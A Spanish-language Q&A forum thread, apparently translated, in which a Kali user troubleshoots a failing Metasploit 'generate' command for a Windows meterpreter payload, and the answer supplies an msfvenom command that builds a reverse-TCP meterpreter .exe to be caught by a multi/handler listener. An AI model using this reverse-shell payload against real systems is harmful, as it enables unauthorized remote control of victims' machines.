Metasploit generar comando no funciona

0

Usando windows / smb / ms08_067_netapi exploit y windows / meterpreter / reverse_tcp como carga útil, esto es lo que obtengo:

msf payload(reverse_tcp) > generate -f ~/Desktop/rootkit.exe -p windows -t exe
[*] Writing 73802 bytes to ~/Desktop/rootkit.exe...
[-] Error while running command generate: No such file or directory @ rb_sysopen - ~/Desktop/rootkit.exe

Pila de llamadas:

/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/payload.rb:148:in 'initialize'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/payload.rb:148:in 'open'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/payload.rb:148:in 'cmd_generate'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in 'run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in 'block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in 'each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in 'run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:205:in 'run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in 'start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in 'start'
/usr/bin/msfconsole:48:in '<main>'

No estoy seguro de cuál es el problema. Estoy corriendo Kali en una caja virtual. ¿Alguien tiene alguna idea?

    
pregunta Kevin G. 25.06.2017 - 21:41
fuente

1 respuesta

1

Para usar el exploit ms08_067_netapi, no necesita Windows para ejecutar nada. Puedes explotarlo directamente. No estoy seguro de por qué estás creando un archivo ejecutable para explotar esa vulnerabilidad. Eso no es necesario.

De todos modos, para crear un archivo .exe de meter_impresión_tcp, ¿por qué no usas msfvenom?

Fuera de msfconsole, desde un terminal estándar. Tipo:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe > ~/Desktop/rootkit.exe

No olvides reemplazar x.x.x.x con tu dirección IP. Esta dirección IP debe ser del host de Metasploit que se va a escuchar usando exploit / multi / handler mientras Windows ejecuta el archivo .exe. El puerto también se puede cambiar, pero el valor predeterminado es 4444.

    
respondido por el OscarAkaElvis 25.06.2017 - 21:51
fuente

Lea otras preguntas en las etiquetas